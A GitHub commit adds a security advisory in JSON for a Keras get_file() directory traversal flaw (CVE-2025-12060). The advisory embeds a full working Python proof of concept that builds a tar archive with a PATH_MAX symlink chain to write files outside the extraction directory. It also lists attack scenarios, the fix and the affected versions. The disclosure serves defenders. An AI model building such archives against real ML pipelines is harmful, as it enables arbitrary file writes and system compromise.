Skip to content

Commit 97304e5

Browse files
1 parent 7d11a8d commit 97304e5

File tree

1 file changed

+84
-0
lines changed

1 file changed

+84
-0
lines changed
Lines changed: 84 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,84 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-hjqc-jx6g-rwp9",
4+
"modified": "2025-12-02T00:58:33Z",
5+
"published": "2025-12-02T00:58:33Z",
6+
"aliases": [
7+
"CVE-2025-12060"
8+
],
9+
"summary": "Keras Directory Traversal Vulnerability",
10+
"details": "## Summary\n\nKeras's `keras.utils.get_file()` function is vulnerable to directory traversal attacks despite implementing `filter_safe_paths()`. The vulnerability exists because `extract_archive()` uses Python's `tarfile.extractall()` method without the security-critical `filter=\"data\"` parameter. A PATH_MAX symlink resolution bug occurs before path filtering, allowing malicious tar archives to bypass security checks and write files outside the intended extraction directory.\n\n## Details\n\n### Root Cause Analysis\n\n**Current Keras Implementation**\n```python\n# From keras/src/utils/file_utils.py#L121\nif zipfile.is_zipfile(file_path):\n # Zip archive.\n archive.extractall(path)\nelse:\n # Tar archive, perhaps unsafe. Filter paths.\n archive.extractall(path, members=filter_safe_paths(archive))\n```\n\n### The Critical Flaw\n\nWhile Keras attempts to filter unsafe paths using `filter_safe_paths()`, this filtering happens after the tar archive members are parsed and before actual extraction. However, the PATH_MAX symlink resolution bug occurs during extraction, not during member enumeration.\n\n**Exploitation Flow:**\n1. **Archive parsing**: `filter_safe_paths()` sees symlink paths that appear safe\n2. **Extraction begins**: `extractall()` processes the filtered members\n3. **PATH_MAX bug triggers**: Symlink resolution fails due to path length limits\n4. **Security bypass**: Failed resolution causes literal path interpretation\n5. **Directory traversal**: Files written outside intended directory\n\n### Technical Details\n\nThe vulnerability exploits a known issue in Python's `tarfile` module where excessively long symlink paths can cause resolution failures, leading to the symlink being treated as a literal path. 
This bypasses Keras's path filtering because:\n\n- `filter_safe_paths()` operates on the parsed tar member information\n- The PATH_MAX bug occurs during actual file system operations in `extractall()`\n- Failed symlink resolution falls back to literal path interpretation\n- This allows traversal paths like `../../../../etc/passwd` to be written\n\n### Affected Code Location\n\n**File**: `keras/src/utils/file_utils.py` \n**Function**: `extract_archive()` around line 121 \n**Issue**: Missing `filter=\"data\"` parameter in `tarfile.extractall()`\n\n## Proof of Concept\n```\n#!/usr/bin/env python3\nimport os, io, sys, tarfile, pathlib, platform, threading, time\nimport http.server, socketserver\n\n# Import Keras directly (not through TensorFlow)\ntry:\n import keras\n print(\"Using standalone Keras:\", keras.__version__)\n get_file = keras.utils.get_file\nexcept ImportError:\n try:\n import tensorflow as tf\n print(\"Using Keras via TensorFlow:\", tf.keras.__version__)\n get_file = tf.keras.utils.get_file\n except ImportError:\n print(\"Neither Keras nor TensorFlow found!\")\n sys.exit(1)\n\nprint(\"=\" * 60)\nprint(\"Keras get_file() PATH_MAX Symlink Vulnerability PoC\")\nprint(\"=\" * 60)\nprint(\"Python:\", sys.version.split()[0])\nprint(\"Platform:\", platform.platform())\n\nroot = pathlib.Path.cwd()\nprint(f\"Working directory: {root}\")\n\n# Create target directory for exploit demonstration\nexploit_dir = root / \"exploit\"\nexploit_dir.mkdir(exist_ok=True)\n\n# Clean up any previous exploit files\ntry:\n (exploit_dir / \"keras_pwned.txt\").unlink()\nexcept FileNotFoundError:\n pass\n\nprint(f\"\\n=== INITIAL STATE ===\")\nprint(f\"Exploit directory: {exploit_dir}\")\nprint(f\"Files in exploit/: {[f.name for f in exploit_dir.iterdir()]}\")\n\n# Create malicious tar with PATH_MAX symlink resolution bug\nprint(f\"\\n=== Building PATH_MAX Symlink Exploit ===\")\n\n# Parameters for PATH_MAX exploitation\ncomp = 'd' * (55 if sys.platform == 'darwin' else 247)\nsteps = 
\"abcdefghijklmnop\" # 16-step symlink chain\npath = \"\"\n\nwith tarfile.open(\"keras_dataset.tgz\", mode=\"w:gz\") as tar:\n print(\"Creating deep symlink chain...\")\n \n # Build the symlink chain that will exceed PATH_MAX during resolution\n for i, step in enumerate(steps):\n # Directory with long name\n dir_info = tarfile.TarInfo(os.path.join(path, comp))\n dir_info.type = tarfile.DIRTYPE\n tar.addfile(dir_info)\n \n # Symlink pointing to that directory\n link_info = tarfile.TarInfo(os.path.join(path, step))\n link_info.type = tarfile.SYMTYPE\n link_info.linkname = comp\n tar.addfile(link_info)\n \n path = os.path.join(path, comp)\n \n if i < 3 or i % 4 == 0: # Print progress for first few and every 4th\n print(f\" Step {i+1}: {step} -> {comp[:20]}...\")\n \n # Create the final symlink that exceeds PATH_MAX\n # This is where the symlink resolution breaks down\n long_name = \"x\" * 254\n linkpath = os.path.join(\"/\".join(steps), long_name)\n \n max_link = tarfile.TarInfo(linkpath)\n max_link.type = tarfile.SYMTYPE\n max_link.linkname = (\"../\" * len(steps))\n tar.addfile(max_link)\n \n print(f\"✓ Created PATH_MAX symlink: {len(linkpath)} characters\")\n print(f\" Points to: {'../' * len(steps)}\")\n \n # Exploit file through the broken symlink resolution\n exploit_path = linkpath + \"/../../../exploit/keras_pwned.txt\"\n exploit_content = b\"KERAS VULNERABILITY CONFIRMED!\\nThis file was created outside the cache directory!\\nKeras get_file() is vulnerable to PATH_MAX symlink attacks!\\n\"\n \n exploit_file = tarfile.TarInfo(exploit_path)\n exploit_file.type = tarfile.REGTYPE\n exploit_file.size = len(exploit_content)\n tar.addfile(exploit_file, fileobj=io.BytesIO(exploit_content))\n \n print(f\"✓ Added exploit file via broken symlink path\")\n \n # Add legitimate dataset content\n dataset_content = b\"# Keras Dataset Sample\\nThis appears to be a legitimate ML dataset\\nimage1.jpg,cat\\nimage2.jpg,dog\\nimage3.jpg,bird\\n\"\n dataset_file = 
tarfile.TarInfo(\"dataset/labels.csv\")\n dataset_file.type = tarfile.REGTYPE\n dataset_file.size = len(dataset_content)\n tar.addfile(dataset_file, fileobj=io.BytesIO(dataset_content))\n \n # Dataset directory\n dataset_dir = tarfile.TarInfo(\"dataset/\")\n dataset_dir.type = tarfile.DIRTYPE\n tar.addfile(dataset_dir)\n\nprint(\"✓ Malicious Keras dataset created\")\n\n# Comparison Test: Python tarfile with filter (SAFE)\nprint(f\"\\n=== COMPARISON: Python tarfile with data filter ===\")\ntry:\n with tarfile.open(\"keras_dataset.tgz\", \"r:gz\") as tar:\n tar.extractall(\"python_safe\", filter=\"data\")\n \n files_after = [f.name for f in exploit_dir.iterdir()]\n print(f\"✓ Python safe extraction completed\")\n print(f\"Files in exploit/: {files_after}\")\n \n # Cleanup\n import shutil\n if pathlib.Path(\"python_safe\").exists():\n shutil.rmtree(\"python_safe\", ignore_errors=True)\n \nexcept Exception as e:\n print(f\"❌ Python safe extraction blocked: {str(e)[:80]}...\")\n files_after = [f.name for f in exploit_dir.iterdir()]\n print(f\"Files in exploit/: {files_after}\")\n\n# Start HTTP server to serve malicious archive\nclass SilentServer(http.server.SimpleHTTPRequestHandler):\n def log_message(self, *args): pass\n\ndef run_server():\n with socketserver.TCPServer((\"127.0.0.1\", 8005), SilentServer) as httpd:\n httpd.allow_reuse_address = True\n httpd.serve_forever()\n\nserver = threading.Thread(target=run_server, daemon=True)\nserver.start()\ntime.sleep(0.3)\n\n# Keras vulnerability test\ncache_dir = root / \"keras_cache\"\ncache_dir.mkdir(exist_ok=True)\nurl = \"http://127.0.0.1:8005/keras_dataset.tgz\"\n\nprint(f\"\\n=== KERAS VULNERABILITY TEST ===\")\nprint(f\"Testing: keras.utils.get_file() with extract=True\")\nprint(f\"URL: {url}\")\nprint(f\"Cache: {cache_dir}\")\nprint(f\"Expected extraction: keras_cache/datasets/keras_dataset/\")\nprint(f\"Exploit target: exploit/keras_pwned.txt\")\n\ntry:\n # The vulnerable Keras call\n extracted_path = get_file(\n 
\"keras_dataset\",\n url,\n cache_dir=str(cache_dir),\n extract=True\n )\n print(f\"✓ Keras extraction completed\")\n print(f\"✓ Returned path: {extracted_path}\")\n \nexcept Exception as e:\n print(f\"❌ Keras extraction failed: {e}\")\n import traceback\n traceback.print_exc()\n\n# Vulnerability assessment\nprint(f\"\\n=== VULNERABILITY RESULTS ===\")\nfinal_exploit_files = [f.name for f in exploit_dir.iterdir()]\nprint(f\"Files in exploit directory: {final_exploit_files}\")\n\nif \"keras_pwned.txt\" in final_exploit_files:\n print(f\"\\n🚨 KERAS VULNERABILITY CONFIRMED! 🚨\")\n \n exploit_file = exploit_dir / \"keras_pwned.txt\"\n content = exploit_file.read_text()\n print(f\"Exploit file created: {exploit_file}\")\n print(f\"Content:\\n{content}\")\n \n print(f\"🔍 TECHNICAL DETAILS:\")\n print(f\" • Keras uses tarfile.extractall() without filter parameter\")\n print(f\" • PATH_MAX symlink resolution bug bypassed security checks\")\n print(f\" • File created outside intended cache directory\")\n print(f\" • Same vulnerability pattern as TensorFlow get_file()\")\n \n print(f\"\\n📊 COMPARISON RESULTS:\")\n print(f\" ✅ Python with filter='data': BLOCKED exploit\")\n print(f\" ⚠️ Keras get_file(): ALLOWED exploit\")\n \nelse:\n print(f\"✅ No exploit files detected\")\n print(f\"Possible reasons:\")\n print(f\" • Keras version includes security patches\")\n print(f\" • Platform-specific path handling prevented exploit\")\n print(f\" • Archive extraction path differed from expected\")\n\n# Show what Keras actually extracted (safely)\nprint(f\"\\n=== KERAS EXTRACTION ANALYSIS ===\")\ntry:\n if 'extracted_path' in locals() and pathlib.Path(extracted_path).exists():\n keras_path = pathlib.Path(extracted_path)\n print(f\"Keras extracted to: {keras_path}\")\n \n # Safely list contents\n try:\n contents = [item.name for item in keras_path.iterdir()]\n print(f\"Top-level contents: {contents}\")\n \n # Count symlinks (indicates our exploit structure was created)\n symlink_count 
= 0\n for item in keras_path.iterdir():\n try:\n if item.is_symlink():\n symlink_count += 1\n except PermissionError:\n continue\n \n print(f\"Symlinks created: {symlink_count}\")\n if symlink_count > 0:\n print(f\"✓ PATH_MAX symlink chain was extracted\")\n \n except PermissionError:\n print(f\"Permission errors in extraction directory (expected with symlink corruption)\")\n \nexcept Exception as e:\n print(f\"Could not analyze Keras extraction: {e}\")\n\nprint(f\"\\n=== REMEDIATION ===\")\nprint(f\"To fix this vulnerability, Keras should use:\")\nprint(f\"```python\")\nprint(f\"tarfile.extractall(path, filter='data') # Safe\")\nprint(f\"```\")\nprint(f\"Instead of:\")\nprint(f\"```python\") \nprint(f\"tarfile.extractall(path) # Vulnerable\")\nprint(f\"```\")\n\n# Cleanup\nprint(f\"\\n=== CLEANUP ===\")\ntry:\n os.unlink(\"keras_dataset.tgz\")\n print(f\"✓ Removed malicious tar file\")\nexcept:\n pass\n\nprint(\"PoC completed!\")\n\n```\n### Environment Setup\n- **Python**: 3.8+ (tested on multiple versions)\n- **Keras**: Standalone Keras or TensorFlow.Keras\n- **Platform**: Linux, macOS, Windows (path handling varies)\n\n### Exploitation Steps\n\n1. **Create malicious tar archive** with PATH_MAX symlink chain\n2. **Host archive** on accessible HTTP server\n3. **Call `keras.utils.get_file()`** with `extract=True`\n4. 
**Observe directory traversal** - files written outside cache directory\n\n### Key Exploit Components\n\n- **Deep symlink chain**: 16+ nested symlinks with long directory names\n- **PATH_MAX overflow**: Final symlink path exceeding system limits\n- **Traversal payload**: Relative path traversal (`../../../target/file`)\n- **Legitimate disguise**: Archive contains valid-looking dataset files\n\n### Demonstration Results\n\n**Vulnerable behavior:**\n- Files extracted outside intended `cache_dir/datasets/` location\n- Security filtering bypassed completely\n- No error or warning messages generated\n\n**Expected secure behavior:**\n- Extraction blocked or confined to cache directory\n- Security warnings for suspicious archive contents\n\n## Impact\n\n### Vulnerability Classification\n- **Type**: Directory Traversal / Path Traversal (CWE-22)\n- **Severity**: High\n- **CVSS Components**: Network accessible, no authentication required, impacts confidentiality and integrity\n\n### Who Is Impacted\n\n**Direct Impact:**\n- Applications using `keras.utils.get_file()` with `extract=True`\n- Machine learning pipelines downloading and extracting datasets\n- Automated ML training systems processing external archives\n\n**Attack Scenarios:**\n1. **Malicious datasets**: Attacker hosts compromised ML dataset\n2. **Supply chain**: Legitimate dataset repositories compromised\n3. **Model poisoning**: Extraction writes malicious files alongside training data\n4. 
**System compromise**: Configuration files, executables written to system directories\n\n**Affected Environments:**\n- Research environments downloading public datasets\n- Production ML systems with automated dataset fetching\n- Educational platforms using Keras for tutorials\n- CI/CD pipelines training models with external data\n\n### Risk Assessment\n\n**High Risk Factors:**\n- Common usage pattern in ML workflows\n- No user awareness of extraction security\n- Silent failure mode (no warnings)\n- Cross-platform vulnerability\n\n**Potential Consequences:**\n- Arbitrary file write on target system\n- Configuration file tampering\n- Code injection via overwritten scripts\n- Data exfiltration through planted files\n- System compromise in containerized environments\n\n## Recommended Fix\n\n### Immediate Mitigation\n\nReplace the vulnerable extraction code with:\n\n```python\n# Secure implementation\nif zipfile.is_zipfile(file_path):\n # Zip archive - implement similar filtering\n archive.extractall(path, members=filter_safe_paths(archive))\nelse:\n # Tar archive with proper security filter\n archive.extractall(path, members=filter_safe_paths(archive), filter=\"data\")\n```\n\n### Long-term Solution\n\n1. **Add `filter=\"data\"` parameter** to all `tarfile.extractall()` calls\n2. **Implement comprehensive path validation** before extraction\n3. **Add extraction logging** for security monitoring\n4. **Consider sandboxed extraction** for untrusted archives\n5. 
**Update documentation** to warn about archive security risks\n\n### Backward Compatibility\n\nThe fix maintains full backward compatibility as `filter=\"data\"` is the recommended secure default for Python 3.12+.\n\n## References\n\n- [Python tarfile security documentation](https://docs.python.org/3/library/tarfile.html#extraction-filters)\n- [CVE-2007-4559](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4559) - Related tarfile vulnerability\n- [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n\nNote: This issue was also reported on Huntr, but no response was received:\nhttps://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
15+
},
16+
{
17+
"type": "CVSS_V4",
18+
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
19+
}
20+
],
21+
"affected": [
22+
{
23+
"package": {
24+
"ecosystem": "PyPI",
25+
"name": "keras"
26+
},
27+
"ranges": [
28+
{
29+
"type": "ECOSYSTEM",
30+
"events": [
31+
{
32+
"introduced": "0"
33+
},
34+
{
35+
"fixed": "3.12.0"
36+
}
37+
]
38+
}
39+
],
40+
"database_specific": {
41+
"last_known_affected_version_range": "<= 3.11.3"
42+
}
43+
}
44+
],
45+
"references": [
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
49+
},
50+
{
51+
"type": "ADVISORY",
52+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060"
53+
},
54+
{
55+
"type": "ADVISORY",
56+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12638"
57+
},
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/keras-team/keras/pull/21760"
61+
},
62+
{
63+
"type": "WEB",
64+
"url": "https://github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951"
65+
},
66+
{
67+
"type": "PACKAGE",
68+
"url": "https://github.com/keras-team/keras"
69+
},
70+
{
71+
"type": "WEB",
72+
"url": "https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4"
73+
}
74+
],
75+
"database_specific": {
76+
"cwe_ids": [
77+
"CWE-22"
78+
],
79+
"severity": "HIGH",
80+
"github_reviewed": true,
81+
"github_reviewed_at": "2025-12-02T00:58:33Z",
82+
"nvd_published_at": null
83+
}
84+
}

0 commit comments

Comments
 (0)